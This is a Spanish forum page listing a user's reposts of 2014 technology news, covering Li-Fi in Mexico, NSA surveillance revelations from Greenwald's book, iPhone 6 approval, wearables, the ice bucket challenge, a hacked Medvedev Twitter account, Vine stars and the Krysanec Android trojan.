Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Mister12

#46
El uso de la innovadora tecnología Li-Fi en América Latina arrancará el próximo mes octubre con la llegada a México de nuevos auriculares, capaces de recibir la señal de audio en tiempo real mediante la conexión inalámbrica por focos led.



En un futuro próximo será posible sustituir la conexión inalámbrica por radiofrecuencia (bluetooth) por los ledes (diodos transmisores de luz). De esta forma, por ejemplo, se podrá transmitir a audífonos "diferente música acorde a cuántos focos led tenga la casa o negocio", explicó un directivo de la operadora en México, Sisoft, citado por la revista digital 'Ideal'.

El objetivo es competir con el Wi-Fi en todas las redes, puntos y áreas de acceso a Internet, aprovechando la rapidez del nuevo protocolo. El servicio, bautizado InternetLedCom, ofrecerá velocidades de conexión de hasta 10 gigabytes por segundo. Así, según calculan los expertos de la empresa, para descargar un largometraje en HD se necesitarán solo 45 segundos. 

Algunos dispositivos con Li-Fi llegarán a Ciudad de México en el primer trimestre de 2015 en forma de kit para el hogar, apareciendo también en las empresas y los hospitales de la capital mexicana.

Los focos led funcionan mediante ciclos de encendido y apagado, generando un flujo sencillo de datos y de baja velocidad. Sin embargo, al combinarse, ellos mismos transmiten miles de señales a alta velocidad. El proceso es imperceptible para el ojo humano, ya que los cambios de estado se producen en nanosegundos.

A esta característica se suma la gran seguridad de la transmisión informática que prometen los proveedores. Al no haber ondas de por medio, el protocolo no será vulnerable a la interceptación que realizan los 'hackers'. Además, la señal supersónica mantendrá llamadas sin interrupciones.

Se espera que para el año 2018 la tecnología Li-Fi genere ventas por valor de 6.000 millones de dólares a nivel global. Mientras tanto, los empresarios mexicanos ya se han asegurado un lugar entre los pioneros del sector.

http://actualidad.rt.com/ciencias/view/137383-mexico-america-tecnologia-led
#47
La NSA instaló dispositivos de espionaje en equipos informáticos fabricados en Estados Unidos

El nuevo libro de Glenn Greenwald, "Sin un lugar donde esconderse", incluye nuevas revelaciones y documentos sobre el espionaje de la NSA. España es uno de los países que está entre los objetivos del espionaje comercial de Estados Unidos. "Sin un lugar donde esconderse" es un alegato a la capacidad de plantar cara a un sistema de vigilancia global que pretende "transformar la red en un instrumento de represión".

La distopía de los autores cyberpunks, un mundo donde todos somos vigilados y la tecnología puede convertirse en una amenaza,  parece tomar vida cuando se leen, uno tras otro, los métodos y técnicas desarrollados por la NSA para construir un sistema de espionaje total.

Aunque algunos de los programas que describe Glenn Greenwald en su libro " Sin un lugar donde esconderse" (Ediciones B), que este miércoles sale a la venta en España tras su lanzamiento hace unos días en Estados Unidos, han sido ya dados a conocer en el goteo de exclusivas que desde el pasado junio se llevan produciendo, otros son desvelados por primera vez.

Entre ellos, probablemente el más escandaloso es el que se refiere a la manipulación de equipos informáticos fabricados en EE.UU. para instalarles dispositivos de espionaje antes de ser exportados. "Sin un lugar donde esconderse" también documenta casos de espionaje económico, diplomático y de técnicas de propaganda (como la difusión en Internet de material engañoso) o de ingeniería social.

En la web de autor, glenngreenwald.net, están disponibles en abierto todos los nuevos documentos que aparecen en libro junto con otro material adicional como las referencias bibliográficas.

El origen de todas estas informaciones son las "decenas de miles" de documentos secretos que el ex analista de la NSA, Edward Snowden, había estado recopilando en los últimos dos años y que, como se relata en libro, catalogaba con precisión: "El archivo de Snowden estaba ordenado de forma elegante", cuenta Greenwald. Snowden proporcionaba, además, glosarios y diccionarios con los términos técnicos empleados por la Agencia de espionaje.

Greenwald accedió por primera vez a este inmenso archivo en su vuelo, junto con la documentalista Laura Poitras (una figura igualmente esencial en el caso), hacia Hong Kong, donde habían acordado reunirse con Snowden. Curiosamente, el periodista y ex abogado, dejó para el final, según relata, un documento guardado como "LÉEME_PRIMERO". En él, Snowden explicaba las razones para seguir adelante con su denuncia, consciente del precio que tendría que pagar. Y concluía así: "He estado en los rincones más oscuros del gobierno, y lo que ellos temen es la luz".

Nuevas revelaciones

Algunas de las nuevas revelaciones que contiene el libro se refieren a programas ya conocidos pero que ahora se explican con detalles adicionales. Otros documentos, como la fotografía de los agentes de la NSA desmontando un equipo de Cisco, se publican por primera vez.

Espionaje económico y comercial. Varios documentos ilustran la actividad de la NSA destinada a obtener información que le diese a Estados Unidos ventaja comercial. Entre ellos, las diapositivas que describen el programa BLARNEY, puesto en marcha en 1978. En las filtraciones ya publicadas, apareció mencionado por primera vez en el Power Point que describía el programa PRISM. En el libro, Greenwald explica ahora que este programa es una pieza también de espionaje económico que cuenta entre sus "clientes" a departamentos y agencias económicas del gobierno.

Además, se aportan pruebas adicionales recientes como un documento de 2013 que menciona entre los temas informados por la NSA la "energía", el "comercio" o el "petróleo". Y un memorándum de 2006 (ver diapositiva 49 de los documentos de Greenwald, más abajo) que explica el espionaje comercial en países como Francia, Alemania, Italia y España.

El papel de las empresas. Greenwald  en " Sin un lugar donde esconderse" reporta con detalle el papel de empresas tecnológicas en el espionaje de la NSA. En una las diapositivas que se reproducen, se mencionan como "aliados estratégicos" desde los grandes fabricantes de equipos o componentes, como IBM, Intel, Cisco, HP o Microsoft, a empresas de telecomunicaciones y operadores como AT&T, Verizon, Motorola o Qwest.

Algunos pasajes son especialmente terribles, como cuando se describe la colaboración de Microsoft con el FBI para sortear el sistema de cifrado que habían implementado para Outlook (ver diapositiva 30 de los documentos de Greenwald) o la capacidad de acceder  sin autorización previa a los documentos y archivos de los usuarios en SkyDrive, el servicio de almacenamiento en la nube de la compañía.

Manipulación de equipos. La fotografía de dos agentes de la NSA desmontando por la fuerza un equipo de Cisco (diapositiva 62 de los documentos) es suficientemente reveladora para comprender la sensación de omnipotencia de los servicios de inteligencia norteamericanos.

En el libro, Greenwald cuenta que la " NSA recibe o intercepta rutinariamente routers, servidores y otros dispositivos informáticos de red ―que EE.UU. exporta― antes de ser enviados a los clientes internacionales". En el documento de la NSA filtrado se explica cómo la agencia entonces implanta directamente instrumentos de vigilancia, los re-empaqueta y los devuelve al circuito comercial.

En este punto Greenwald es muy duro con lo que califica de "hipocresía" del gobierno norteamericano demonizando la tecnología china, precisamente por ese riesgo potencial, cuando eran ellos mismos quienes lo estaban llevando a cabo. Y apunta el motivo: Los equipos chinos (por otro lado, objeto de ataques intrusivos de la NSA, como el caso de Huawei) "suponen no solo competencia económica, sino también competencia con respecto a la vigilancia".

Reuters informaba ayer que el presidente de Cisco había escrito a Obama instándole a restringir la vigilancia del gobierno tras estas pruebas. En la carta, con fecha 15 de mayo, John Chambers, director ejecutivo y presidente de la compañía, advertía de la pérdida de confianza en la industria de tecnología de EE.UU. y pedía nuevas  normas en la forma en que la NSA lleva a cabo su vigilancia.

Conversaciones en vuelo. La intención de la NSA de que ningún tipo de comunicación quede fuera de su alcance queda de manifiesto en programas como el denominado  "Homing Pigeon"  (Paloma Mensajera) o el "Thieving Magpie" que, desarrollados conjuntamente con el GCHQ británico, pretenden conseguir interceptar las conversaciones durante los vuelos.

Propaganda e ingeniería social. La NSA también emplea, según puede leerse en "Sin un lugar donde esconderse" prácticas de ingeniería social (como las usadas por los ciberestafadores ). El título del documento de la NSA que explica estos métodos es suficientemente ilustrativo: "El arte del engaño: instrucciones para una nueva generación de operaciones online".

Entre estas técnicas se incluiría también la difusión de contenidos falsos, operaciones para dañar la reputación, señuelos, la infiltración y se menciona incluso "la legitimación de la violencia" o la "creación en la mente de los objetivos de experiencias que deban aceptar sin darse cuenta".

Activistas y disidentes como objetivo. Entre los objetivos específicos de la NSA se encuentran perfiles que pueden calificarse de "incómodos" para el sistema: Desde Anonymous, a organismos internacionales como la ONU, activistas de defensa de los derechos humanos ,  la "red humana de apoyo a Wikileaks" o personas que consideran con ideas "radicales".

En un caso que Greenwald reproduce como ejemplo (diapositiva 98 de los documentos) se recomienda explotar las "vulnerabilidades de las conductas privadas", como la visión de contenidos explícitamente sexuales online o "cargar una cantidad de dinero exorbitante por sus conferencias".

Para contextualizar el alcance de estas "misiones", Greenwald relata en detalle el caso COINTELPRO, un programa del FBI de los años 70 para desactivar movimientos de protesta (contra la guerra, a favor de minorías...) y que dio lugar a una comisión de investigación en el Senado, el Comité Church.

Precisamente, Greenwald toma el final de una cita del presidente de esta comisión, el senador Frank Church, pronunciada en 1975, como título de su libro: "Esta capacidad [de control y vigilancia del gobierno] puede en cualquier momento volverse en contra del pueblo norteamericano, y a ningún norteamericano le quedaría privacidad alguna, tal es la capacidad de controlar todo... conversaciones telefónicas, telegramas, lo que sea... No habría ningún lugar para esconderse".

Con la descripción minuciosa de estos programas, Greenwald pretende ilustrar la filosofía de "recoger todo" que impregna todas las actividades y programas de la NSA: "El mero hecho de tener capacidad para obtener estas comunicaciones se ha convertido en sí mismo en otro fundamento lógico para hacerlo", argumenta el escritor.

Y también llamar la atención sobre el riesgo que representa: "Desde la época en que Internet empezó a usarse ampliamente, muchos han detectado su extraordinario potencial [...] La libertad en Internet [...] es fundamental para el cumplimiento de esa promesa. Por tanto, convertir a Internet en un sistema de vigilancia destruye su potencial básico. Peor aún, transforma la red en un instrumento de represión...", advierte en las primeras páginas de " Sin un lugar donde esconderse".

"En última instancia, más allá de ventajas económicas y de la manipulación diplomática, un sistema de espionaje omnipresente permite a Estados Unidos seguir controlando el mundo. Cuando Estados Unidos sea capaz de saber todo lo que están haciendo, diciendo, pensando y planeando todos ―sus propios ciudadanos, poblaciones extranjeras, empresas internacionales, otros dirigentes gubernamentales―, su poder sobre estos grupos y organizaciones será máximo. Lo cual es doblemente cierto si el gobierno funciona con dosis cada vez mayores de secretismo. El secretismo crea un espejo unidireccional: el gobierno de EE.UU. ve lo que hace todo el mundo, incluida su propia población y nadie ve las acciones del gobierno. Es el desequilibrio supremo, el que permite la más peligrosa de las circunstancias humanas: el ejercicio de un poder ilimitado sin transparencia ni rendición de cuentas. Las revelaciones de Edward Snowden trastocaron esta película dinámica al sacar a la luz el sistema y su funcionamiento. Por primera vez, personas de todo el mundo pudieron saber el verdadero alcance de las capacidades de vigilancia acumuladas en su contra. La noticia desencadenó un intenso y prolongado debate en todo el mundo precisamente porque la vigilancia supone una grave amenaza para la gobernanza democrática. También suscitó propuestas de reforma, una discusión global sobre la importancia de la libertad y la privacidad en Internet en la era electrónica, y la consideración de una cuestión vital: ¿Qué significa la vigilancia sin límites, para nosotros como individuos en nuestras vidas?"

"Sin un lugar donde esconderse: Edward Snowden, la NSA y el Estado de vigilancia de Estados Unidos", Gleen Greenwald (Ediciones B) (Título original: "No Place To Hide: Edward Snowden, the NSA and the U.S. Surveillance State") Páginas: 352 / Formato: 15 x 23 cm / ISBN: 978-84-666-5459-3 PVP: 17.50 €.

http://elespiadigital.net/index.php/noticias/seguridad/6484-la-nsa-instalo-dispositivos-de-espionaje-en-equipos-informaticos-fabricados-en-estados-unidos-
#48
Noticias / Tailandia «delata» a Apple
14 Agosto 2014, 17:32 PM
El país ha autorizado a los de Cupertino a comercializar dos modelos del iPhone 6

El secretario general de la Comisión nacional de transmisiones y telecomunicaciones de Tailandia, Takorn Tantasith, ha anunciado que la comisión que el preside ha aceptado la solicitud de Apple para comercializar dos modelos de iPhone 6 en el país asiático.

Apple envió esta solicitud el pasado 5 de agosto y recibió la autorización el día 8, aunque no fue hasta hace unos días cuando el propio secretario general tuiteó la noticia, eso sí, en tailandés.

Esta autorización viene a confirmar de una vez por todas que Apple ha estado trabajando en dos versiones del iPhone 6 -una de 4,7 pulgadas y otra de 5,5 pulgadas- después de la política de no declaraciones que normalmente lleva a cabo la compañía de Cupertino respecto a sus próximos lanzamientos.

Además, la autorización del organismo tailandés parece confirmar que los dos modelos del iPhone 6 se lanzarán al mismo tiempo, después de que los últimos rumores sobre la fabricación del modelo de 5,5 pulgadas apuntarán a que se estaba retrasando la producción.

En los últimos días, se han filtrado nuevas fotografías de lo que será el 'smartphone' de Apple de 4,7 pulgadas ya terminado y con todas sus piezas ensambladas. Se espera que Apple presente los nuevos iPhone 6 el próximo 9 de septiembre, aunque, por el momento, no haya habido ningún tipo de confirmación por parte de la empresa liderada por Tim Cook.

http://www.abc.es/tecnologia/moviles-telefonia/20140814/abci-apple-tailandia-permiso-iphone6-201408141644.html
#49
Se ha aliado con la Fundación Michael J. Fox para hacer una base de datos al que los científicos tenga acceso libre

Intel Corp planea usar gadgets «wearables» como relojes inteligentes para vigilar a los pacientes con enfermedad de Parkinson y recopilar datos que puedan ser compartidos con los investigadores.

El fabricante de chips dijo que se ha unido a la Fundación Michael J. Fox, fundada por el actor quien fue diagnosticado con la enfermedad en 2000, para llevar a cabo un estudio de investigación de varias fases de esta enfermedad neurodegenerativa.

Se estima que cinco millones personas en todo el mundo han sido diagnosticados con Parkinson, la segunda enfermedad neurodegenerativa más diagnosticada por detrás del Alzheimer.

El objetivo inicial del proyecto es usar wearables para controlar a los pacientes remotamente y almacenar datos en un sistema abierto al que puedean acceder los científicos. En la siguiente fase del estudio, que se espera que empiece en otoño, la Fundación destinaría fondos para ver cómo los pacientes responden a una medicación. Los participantes serán monitoreados mediante una gran variedad de dispositivos portátiles.

«Mientras más de estos dispositivos lleguen al mercado, podremos recoger más mediciones objetivas y determinar la eficacia de la terapia nueva», ha dicho a Reuters Sohini Chowdhury, vicepresidente de alianzas de investigación de la Fundación.

Según informan, los ensayos clínicos desarrollados hasta ahora han sido catalogados como demasiado «subjetivos». Explican que cuando paciente informaba que había sufrido un temblor, quizás señalaba que había durado un minuto cuando en realidad duró sólo segundos.

Esperan que con los wearables se tenga mediciones más precisas sobre la «frecuencia y la gravedad» de los síntomas. La Fundación Michael J. Fox recaudará fondos para poder proporcionar la mayor cantidad de wearables a pacientes posibles.

Hoy en día, muchas personas con la enfermedad de Parkinson son incapaces de participar en ensayos clínicos porque no viven cerca de un centro de investigación. Esto forma parte de una estrategia de Intel de sacar provecho al «internet de las cosas» y del análisis masivo de datos, el llamado Big Data.

http://www.abc.es/tecnologia/informatica-hardware/20140814/abci-intel-wearables-parkinson-201408141344.html
#50
Investigadores de la Universidad de California en San Diego basan su creación en el lactato

Un equipo de la Universidad de California en San Diego ha desarrollado un sensor similar a un tatuaje temporal, que convierte el sudor en electricidad. Los investigadores lo realizaron para medir la actvidad física pero señalan que en un futuro cercano se podría utilizar para cargar la batería de pequeños dispositivos.

El dispositivo extraíble monitorea el lactato: una sustancia que está presente en la transpiración y aumenta con la actividad física vigorosa.

Los investigadores han diseñado este sensor que parece una pegatina para supervisar el progreso de una persona durante el ejercicio. Según explican desde Phys.org, el dispositivo funciona y se activa cuando detecta lactato, que se encuentra de norma natural en el sudor. «El lactato es un indicador muy importante de qué se está haciendo durante el ejercicio», ha dicho una de las investigadores, Wenzhao Jia.

En general, mientras más intenso es el ejercicio, más lactato produce el cuerpo. Durante la actividad física extenuante, el cuerpo necesita generar más energía, por lo que se activa un proceso llamado glucólisis. Glucólisis produce energía y lactato.

Phys señala que los atletas profesionales supervisan sus niveles de lactato durante las pruebas como ua forma de evaluar su aptitud y programar el entrenamiento. Los investigadores apuntan que actualmente las pruebas de lactato son incómodas e intrusivas porque se hacen a través de muestras de sangre que deben ser tomadas durante diversas fases del entretamiento.

Los investigadores de Universidad de California en San Diego desarrollaron un método más sencillo para medir el lactato. Crearon estos «tatuajes» con sensores que contiene una tira con una enzima que «extrae» los electrones del lactato, generando una débil corriente eléctrica.

Basándose en sus buenos resultados, decidieron dar un paso más allá y crear una biobatería que se carga con esta energía proveniente del sudor.

Durante las pruebas, la mayor cantiad de energía producida por una persona fue de 70 microvatios por centímetro cuadrado de piel, algo que podría se runasado para alimentar baterías de pequeños gadgets como relojes y wearables.

http://www.abc.es/tecnologia/informatica-soluciones/20140814/abci-tatoo-sudor-energa-cargar-201408131919.html
#51
Los famosos estadounidense se retan a empaparse con agua muy fría con fines benéficos. El jefe de Facebook ha desafiado a Bill Gates

La idea es simple: llena un cubo con agua helada, arrójala sobre tu cabeza, graba todo el proceso y publíquelo en alguna red social. Es muy frío, divertido, y al parecer contagioso. Este reto del «cubo de agua helada» tiene el fin de concienciar a las personas sobre la esclerosis lateral amiotrófica (ALS por su nombre en inglés, ELA, en español). Detrás del desafío está la ALS Association, que señala que si no cumples el reto, deberás donar a la asociación.

El desafío se ha vuelto un fenómeno viral, por lo menos en los Estados Unidos. De hecho, las donaciones, desde que empezara el juego han aumentado un 1000%. En dos semanas han recaudado más de cinco millones de dólares.

Pero el reto no se ha limitado a la población común, sino que ha llegado a los famosos o personajes reconocidos. Justin Timberlake fue retado, lo hizo con su banda y luego desafió al presentador de televisión Jimmy Fallon, quien aceptó y se empapó con agua fría junto con el staff del programa.

El desafío ha llegado a la esfera tecnológica. El gobernador de New Yersey, Chris Christie, retó a Mark Zuckerberg y este ha publicado empapándose en agua helada.

«Yo he aceptado el reto y ahora desafío a Bill Gates, Sheryl Sandberg y Reed Hastings. Ustedes tiene 24 horas para completar el reto o tendrán que donar dinero a la fundación de ELA... o ambas. Encontrar una forma de tratar y curar la ELA es una importante causa», ha escrito. Sandberg es la número dos de Facebook y Hasting es el CEO y fundador de NetFlix. El CEO de Microsoft Satya Nadella, también ha realizado el reto. El directivo ha retado a Jeff Bezos, CEO de Amazon y a Larry Page, cofundador de Google.

Pero no han sido los únicos CEOs o directivos en empaparse en este reto. Phill Schiller, vicepresidente de hardware de Apple también ha hecho lo propio y ha subido la foto a Twitter. Éste ha retado a Tim Cook.

Dick Costolo, consejero delegado de Twitter aceptó el reto y publicó el vídeo a través de Vine.

Cabe señalar que los «famosos» cumplen el desafío y donan dinero a la fundación. Al reto se han plegado deportistas, presentadores de televisión, estudiantes de Instituto y muchos más.

http://www.abc.es/tecnologia/noticias/20140814/abci-zuckerberg-reto-cubo-agua-201408141136.html
#52
Dimito. Me avergüenza la gestión del Gobierno. Pido perdón», reza uno de los mensajes publicados por Medvedev

Piratas informáticos han logrado acceder a la cuenta oficial de Twitter del primer ministro ruso, Dimitri Medvedev, y han publicado un mensaje en el que anuncian su renuncia por discrepancias con el Gobierno, una dimisión que ha sido desmentida de inmediato por el Kremlin.

La cuenta de Twitter de Medvedev «ha sido hackeada y el tuit sobre su renuncia es falso», ha afirmado el departamento de Comunicación del Gobierno ruso.

«Dimito. Me avergüenza la gestión del Gobierno. Pido perdón», reza la primera de varias entradas publicadas maliciosamente en el 'microblog' de Medvédev, que cuenta con 2,5 millones de lectores.

En otra entrada, al jefe del Gabinete de Ministros se le atribuye una frase alusiva al presidente ruso, Vladímir Putin: «Hace tiempo que querías decirlo: ¡Vova (diminutivo de Vladímir), no tienes razón!».

«Los ciudadanos no deben sufrir las consecuencia de la falta de sentido común de la dirección suprema del país. Podemos volver a los años 80. Es triste. Si ése es el objetivo de mis colegas en el Kremlin, será alcanzado muy pronto», rezan otros de los mensajes publicados por los supuesto hackers.

Un portavoz del primer ministro ruso, Dimitri Peskov, ha asegurado que los mensajes han sido seguramente obra de un hacker. «No tengo información pero estoy bastante seguro de que esto ha sido un hacker», ha explicado.

El Departamento de Comunicación del Gobierno ruso ha indicado que ha abierto una investigación sobre el ataque. Los mensajes supuestamente enviados por los piratas informáticos, que estaban en ruso escritos en cirílico, ya han sido eliminados de la cuenta.

http://www.abc.es/tecnologia/redes/20140814/abci-hackean-twitter-primer-ministro-201408141402.html
#53
¿Quién en su sano juicio pagaría a un adolescente, conocido por sus chistes sobre pedos y bromas sexistas, por hacer publicidad en un video de seis segundos? Al parecer, Coca Cola, Pepsi y otras marcas globales deseosas de conectarse con consumidores jóvenes.


Los usuarios de Vine pueden saber cuándo sus videos están siendo comentados.

Así se resume la historia de aquellos que están ganando dinero gracias a Vine.

Esta aplicación creada en junio de 2012 y adquirida por la red social Twitter en octubre de ese mismo año, justo antes de su lanzamiento oficial, permite a sus usuarios crear audiovisuales de seis segundos fácilmente.
Estos se pueden publicar a través de su propia red social y compartirlos después en otros servicios, como Twitter y Facebook.
Con la aplicación se puede además navegar entre los videos que otros usuarios han compartido y entre los más vistos en las redes sociales.
Gracias a esas conexiones, en poco tiempo algunos breves videos se hacen increíblemente populares entre adolescentes. Y como consecuencia sus protagonistas, conocidos como "viners" por su voz en inglés, están ganando cada vez más dinero promocionando productos entre sus seguidores.

"Viners" sin control

Pero el asunto es que los "viners" son, en general, también adolescentes. Jóvenes sin entrenar, sin un ejército de publicistas detrás, cuya imagen se asocia a la marca directamente y sin filtro ante la mirada pública.
"Es un riesgo que las firmas deben asumir ahora si quieren conectar con su audiencia", dice Jeetendr Sehdev, un profesor de mercadotecnia de la Universidad del Sur de California, en Estados Unidos.
Y añade que con frecuencia las celebridades de las redes sociales suelen ser más conocidas entre la gente joven que las estrellas de cine o televisión.
Es el caso de Nash Grier, la persona con más seguidores en Vine. De ser un estudiante de 16 años de Carolina del Norte (EE.UU.) pasó a ser una estrella de internet, lo que lo ha llevado a Hollywood.


Los "viners" Nash Grier (izquierda), Cameron Dallas y Carter Reynolds tienen
millones de seguidores en la red social.

Más de 9 millones de usuarios siguen y comparten sus videos, que básicamente muestran peleas con almohadas, guerras de agua, interacciones con su hermana pequeña y playback de canciones pop.
Al fin y al cabo, enseñan un comportamiento adolescente estándar. Excepto cuando se tuercen las cosas.
Grier y sus amigos fueron duramente criticados por sexistas cuando compartieron un video de YouTube sobre cómo una chica debe comportarse para resultar atractiva. Entre otros consejos, sugerían ser natural pero sin tener vello corporal.
Además lo maldijeron por gritar un insulto homofóbico. El video fue borrado de Vine, pero reapareció el mes pasado. Grier se disculpó, expresó remordimiento públicamente y pidió perdón.

Otros tiempos

En el pasado un episodio así hubiera supuesto un importante revés profesional para cualquiera.
Sin embargo, tras los dos inoportunos videos el número de seguidores del estadounidense creció.
Además de los 9 millones de seguidores de Vine, hoy tiene 6,2 millones en Instagram, 3,3 millones en YouTube y 3 millones en Twitter, lo que, según el medio online Huffington Post, hace que tenga "mejor posición en las redes sociales que la Casa Blanca".

Asimismo, ya tiene apalabrada una película con AwesomenessTV, un canal televisivo que emite contenido para adolescentes y que fue adquirido por los estudios de animación DreamWorks en mayo.
"La diferencia entre Grier y otros famosos que se disculpan es que a él la gente le cree", señala Sehdev.
Y esa distinción se debe a que las estrellas de las redes sociales han sido creadas, precisamente, por sus audiencias, a través de los "me gusta". Como consecuencia, los seguidores tienen un gran sentimiento de pertenencia sobre estas celebridades, cree el profesor.
Rob Fishman, el cofundador de Niche.co, una compañía que conecta las redes sociales con los anunciantes, dice que la gente joven está harta del "contenido superproducido al estilo Hollywood" y que se siente más identificada con comediantes y con adolescentes que dominan estos servicios en línea.
"Algunos pueden actuar, cantar y bailar y muchos de ellos tienen una gran personalidad", añade.
Y matiza: "Conectan con sus fans, pero no tienen ningún talento específico. Se trata más bien de la capacidad que tienen de conectar".

Toda la atención en seis segundos

¿Pero qué se puede decir en un video de seis segundos?
Ser un "viner" de éxito toma su tiempo. Se necesita, por ejemplo, ritmo y sentido de la comedia.
Liane Valenzuela, una música con más de 2,8 millones de seguidores en Vine y conocida como Liane V, asegura que seis segundos es más que suficiente para provocar una impresión.


Un video de la "viner" Liane Valenzuela fue patrocinada por la compañía de Jennifer López.

Comenzó a usar la plataforma como una afición y ahora se ha convertido en un trabajo para ella.
Recientemente le encargaron hacer un video para Vine basado en la nueva canción de Jennifer López, patrocinado por la discográfica de la cantante estadounidense.
Otro "vinner" filmó a Valenzuela y a su padre bailando frente a su casa en el norte de Hollywood, California (EE.UU.).
El videoclip fue capturado con un teléfono inteligente y editado en el mismo momento, lo que les permitió ajustar los pasos de baile a la música.

Trabajo bien pagado

"El secreto para hacer un video exitoso en Vine es ser divertido, obviamente", opina Valenzuela.
Y se explica: "Hay que crear contenido muy creativo, que se pueda relatar. No puedes pensar demasiado, sólo debes divertirte haciéndolo".
Los "viners" dicen que a sus seguidores no les importa que promocionen productos, siempre y cuando mantengan la autenticidad y anuncien solamente artículos que ellos mismos usarían.
Cada acuerdo comercial es diferente, pero el pago promedio es de US$1.000 por cada 100.000 seguidores.

Según esta estimación, Grier podría ganar cerca de US$90.000 por cada video de seis segundos, US$15.000 por cada segundo grabado.
Pero es una línea muy fina la que separa el tener contentos a los seguidores de hacerlos sentir explotados en beneficio ciertas empresas.
En ese sentido, el conocido usuario de Viner, Greg Davis, explica que recibió comentarios desagradables de sus fans después de crear un video patrocinado por Coca Cola para la campaña "Comparte una Coca Cola" de la compañía.
"Recibí tanto odio y negatividad tras el anuncio", exclama Davis. "Me llamaron vendido".
Sin embargo, le pagaron tan bien que asegura que lo volvería a hacer.

Reto futuro

Recientemente aceptó un viaje con todos los gastos pagados a París para asistir al estreno de una película protagonizada por otro "viner", DeStorm Power.
El estudio cinematográfico les encargó como contrapartida promocionar el filme en Vine e Instagram, para animar a sus seguidores a ir a verlo.
"Cuando tiene millones de personas que te siguen, tienes una gran influencia", explica DeStorm.
Y añade: "Así que cuando la cinta está a punto de estrenarse, digo: 'Tienes que ver esta película'. Y probablemente hago que esa gente quiera ir a verla".
Vine es casi un recién nacido. En enero cumplirá su primer año. Así que, como sus estrellas, sin duda cambiará a medida que vaya madurando.
Pero el reto tanto para aplicación como para los "viners" será asegurar que mantienen a la audiencia entretenida sin hacerla sentir explotada por hombres y mujeres anuncio.

http://www.bbc.co.uk/mundo/noticias/2014/08/140814_tecnologia_como_hacer_dinero_vine_lv.shtml
#54
El malware para Android sigue creciendo sin control. Cada poco tiempo aparecen nuevas y complejas herramientas maliciosas para este sistema operativo que buscan engañar a los usuarios para infectar sus dispositivos y, una vez dentro, poder realizar determinadas tareas desde los mismos.


En las últimas horas se ha descubierto un nuevo troyano llamado Krysanec oculto en varias aplicaciones que se hacen pasar por versiones legítimas de las mismas para el sistema operativo de Google, Android. Krysanec se oculta en las aplicaciones y hace la función de troyano RAT (remote access trojan).

Este nuevo troyano ha sido detectado por Eset en la aplicación MobileBank, una versión modificada de una aplicación bancaria desde la que consultar saldos y movimientos, por lo que probablemente este malware esté destinado a robar principalmente datos bancarios de sus víctimas. Este troyano llega principalmente a través de tiendas de aplicaciones no oficiales, muy utilizadas por miles de usuarios pese a los riesgos que ello supone. Este malware también está desarrollado para distribuirse a través de una red social ampliamente utilizada en Rusia, y por clientes de mensajería como una falsa imagen adjunta que llega a los usuarios y que ejecuta el malware cuando la víctima la abre.

Las principales funciones que lleva a cabo este malware de forma remota son:

Tomar fotos
Grabar audio
Controlar la ubicación GPS
Lista de aplicaciones instaladas.
Lista de páginas abiertas.
Lista de llamadas realizadas, perdidas o rechazadas.
Lista de contactos.
Controla la mensajería (SMS, WhatsApp, etc).

Para evitar infectarnos por malware en nuestros dispositivos debemos instalar siempre aplicaciones desde fuentes legales y de confianza, por ejemplo, la tienda de aplicaciones de Google (Play Store), la de Amazon (Amazon App Store), etc. Debemos evitar siempre que sea posible la instalación de aplicaciones desde fuentes que no sean de confianza ya que el ahorrarnos pocos euros (por ejemplo, para piratear una aplicación) nos puede llegar a salir muy caro.

Por otro lado, los antivirus para Android pueden ayudarnos a detectar estas aplicaciones maliciosas, sin embargo, no son una solución muy efectiva ya que los casos que suelen detectar son muy inferiores a los que en realidad existen.

http://www.redeszone.net/2014/08/13/krysanec-una-puerta-trasera-oculta-en-aplicaciones-de-android/
#55
Ya ha pasado más de un año desde que se descubrió el plan de espionaje mundial de las comunicaciones que estaba siendo llevado a cabo por la NSA. Desde el descubrimiento del programa PRISM, cada poco tiempo han aparecido nuevas tecnologías, algunas de ellas preocupantes, con las que la organización está realizando pruebas con el fin de seguir intentando controlar todos los paquetes que viajan por la red.


Según las últimas filtraciones de Edward Snowden, ex-contratista de la NSA, la organización podría haber desarrollado un arma digital capaz de detectar cualquier ataque digital contra la infraestructura informática de Estados Unidos, bloquearlo e incluso contraatacar contra el origen de dicho ataque. La principal "inteligencia" de este arma reside en su capacidad para analizar todo el tráfico que viaje por la red estadounidense y detectar así todo aquel que ha sido generado de manera anómala y que pueda ser causante de un ataque contra la red.

Sin duda el mayor aspecto del que deberíamos preocuparnos es que esta máquina será capaz de contraatacar de manera autónoma, es decir, sin la intervención de ningún ser humano. Un gran riesgo por el que en muchas ocasiones pagarán inocentes ya que, como hemos hablado en otras ocasiones, los piratas informáticos no suelen trabajar directamente desde sus equipos, sino que lo suelen hacer a través de los ordenadores de otros usuarios, previamente infectados por malware.

Vamos a poner un caso, algo extremo, pero no imposible. Ante un supuesto ataque informático contra Estados Unidos, MonsterMind lo detecta, lo bloquea y decide, por sí solo, contraatacar. Lo más probable es que el sistema desde el que se ha realizado el ataque esté infectado por malware, y la máquina va a emprender un ataque contra él. ¿Hasta dónde podría llegar este ataque? Si los rumores son ciertos, la mayor parte del software y hardware privativo tienen puertas traseras instaladas por la NSA, por lo que si esta máquina tiene los datos de la NSA podría tener control pleno y total sobre la inocente máquina desde la que se ha realizado el ataque.

Como la famosa frase de los cómics de Spiderman, "un gran poder conlleva una gran responsabilidad" y una máquina, por mucha inteligencia artificial que tenga, nunca podrá tomar las mismas decisiones que una persona humana, al menos de momento.

Este proyecto estaba en desarrollo hace más de un año cuando Edward Snowden abandonó la organización, desde entonces, no se ha vuelto a saber nada más de él y se desconoce su estado actual. Sin duda un ambicioso programa que se acerca, una vez más, a la ciencia ficción. Demasiados riegos en una tecnología aún demasiado nueva que la organización gubernamental asumirá a costa de los usuarios.

http://www.redeszone.net/2014/08/14/la-nsa-formara-parte-de-la-ciberguerra-con-monstermind/
#56
Hangouts es el cliente de mensajería instantánea desarrollado por Google y sustituto del "desconocido" Google Talk. Este cliente de mensajería ha recibido pocos cambios notables desde su lanzamiento hace más de 1 año y medio. Con el fin de seguir creciendo, la compañía prepara un importante cambio estético para él, concretamente para la versión de ordenador. El cambio de interfaz de este cliente de mensajería ha sido denominado como "Ultra Violet".


Los principales cambios que prepara esta nueva versión según se puede ver en las fotos filtradas son:

Algunos cambios en la interfaz de usuario.
